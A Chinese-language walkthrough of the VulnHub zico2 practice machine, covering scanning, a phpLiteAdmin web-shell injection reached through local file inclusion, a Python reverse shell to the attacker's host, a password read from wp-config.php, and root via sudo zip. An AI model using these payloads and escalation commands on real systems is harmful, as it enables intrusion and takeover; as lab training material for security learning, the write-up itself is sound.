VulnHub-zico2: 1 靶场渗透测试
时间:2021.4.9
靶场信息:
地址:https://www.vulnhub.com/entry/zico2-1,210/
发布日期:2017年6月19日
目标:得到root权限&找到flag.txt
一、信息收集
1、获取靶机IP地址
nmap -sP 192.168.137.0/24
由探测结果可知,靶机的IP为192.168.137.132
2、扫描开放的端口和服务
nmap -sS -sV -T5 -p- 192.168.137.132
得到开放的端口信息:
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
44814/tcp open status 1 (RPC #100024)
3、网站信息收集
访问80端口
下方点击check out跳转至如下页面
根据url猜测可能有本地文件包含漏洞,试了下果然
dirb爆破一下目录,发现dbadmin目录
二、漏洞探测
访问之后,用弱口令admin登录,发现是一个SQLite数据库管理工具
在kali上搜索一下phpLiteAdmin v1.9.3是否存在可以利用的漏洞
查看利用的方式
三、漏洞利用
根据利用的方法,我们回到phpLiteAdmin页面中,创建一个数据库
随便创建一个表
插入一句话木马
<?php echo system($_GET['cmd']);?>
创建之后,如下
然后我们根据之前的文件包含漏洞,访问生成的数据库文件hack.php
将反弹shell代码经过URL编码通过上面的文件包含漏洞执行尝试反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.150",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
本地监听8888端口,反弹shell成功,进入zico家目录后,发现了wordpress目录,进去发现有一个wp-config.php文件可以查看数据库账号密码
得到密码为sWfCsfJSPV9H3AmQzw8,尝试ssh登录
四、提权
发现可以使用zip来提权
sudo zip /tmp/1.zip /home/zico/raj.txt -T --unzip-command="sh -c /bin/bash"
总结
靶机难度不大,了解了phpLiteAdmin可能的漏洞利用方式,以及后面的zip提权。
趁着年轻,多学些